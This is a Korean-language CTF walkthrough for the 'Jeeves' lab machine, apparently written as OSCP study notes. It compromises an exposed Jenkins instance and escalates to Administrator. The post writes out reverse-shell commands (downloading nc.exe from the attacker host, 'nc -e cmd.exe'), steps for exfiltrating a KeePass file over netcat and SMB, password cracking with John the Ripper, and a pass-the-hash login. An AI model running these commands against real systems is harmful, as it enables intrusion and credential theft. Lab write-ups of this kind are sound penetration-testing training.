
[Windows] Jeeves

우와해커 2020. 6. 11. 16:37


- 커널 권한상승 X (exploit 검색은 셜록이 제일 좋은 듯)
- 키파일 찾아서 passthehash로 로그인

- dirb 브루트포스

포트: 80, 50000


Jenkins 페이지
- 딕셔너리에 단어가 없다면 cewl로 단어 추출해야함
- build 또는 scriptconsole로 커맨드 원격실행


nc -e 옵션
2020 칼리에 있는 nc의 경우 -e (쉘 실행)옵션이 설정이 필요함..


잰킨스 build(windows batch command)

kali: nc -lnvp 5555

잰킨스 build(windows batch command)
Jenkins: powershell Invoke-WebRequest -Uri [kali ip]/nc.exe -Outfile nc.exe
nc.exe -nv [kali ip] -e cmd.exe


Documents 폴더에 CEH.kdbx 파일 존재


kdbx 키파일 전송하기

- nc 또는 impacket-smbserver 사용




해당 키파일 전송하기 위해 칼리에 smb서버 셋팅하기

To do this we’re going to use impacket-smbserver

impacket-smbserver <share name> <share path>, 
so in our instance we’ll do impacket-smbserver Folder pwd

kali>impacket-smbserver Folder pwd

Then, from our Windows target machine, we’ll use some command line magic to mount that location 
Victim> net use s: \\\Folder

Now, on your Kali box, from within your working directory, create a folder called pwd.

kali> mkdir pwd

Now, go back to your shell on the target/Windows machine and copy the file over: 
victim> copy CEH.kdbx s: 



kali: nc -lp 1235 > jeeves.kdbx
windows: nc.exe -w 3 [kali IP] > 1235 < CEH.kdbx



존더리퍼를 사용하기 전에 kdbx파일에서 키를 추출

kali> keepass2john CEH.kdbx > CEHtohack

옵션 사용할때 주의 -w다음에 콜론 입력해주어야함(칼리2020버전) -w:


John the Ripper

kali>john CEHtohack -w:/tools/rockyou.txt
kali>john CEHtohack --show


keypassx로 kdbx파일 열기

Now that the file is in the local machine, we can use KeePassX in order to open this file.
To install KeePassX in Kali Linux is simple as:

  1. apt install keepassx
  2. GUI에서 실행
  3. kdbx파일에 암호가 걸려있음 => 존더리퍼


Pass(Passing) the Hash

The Backup stuff entry in the KeePass file is an NTLM hash for the Administrator user.

which can be used in the Pass the Hash attack.


Using thepass-the-hash technique allows for fairly simple spawning of a session.

kali> pth-winexe -U jeeves/Administrator%[hash] // cmd



Alternate Data Stream (이건 좀...)

There is an alternate data stream for the hm.txt file, which can be discovered with the command

dir /R
more < hm.txt:root.txt



또한 푸는방법 두가지가 존재,
1.rotten Potato without a meterpreter
2.Pass the hash




OSCP 보고서 작성 참고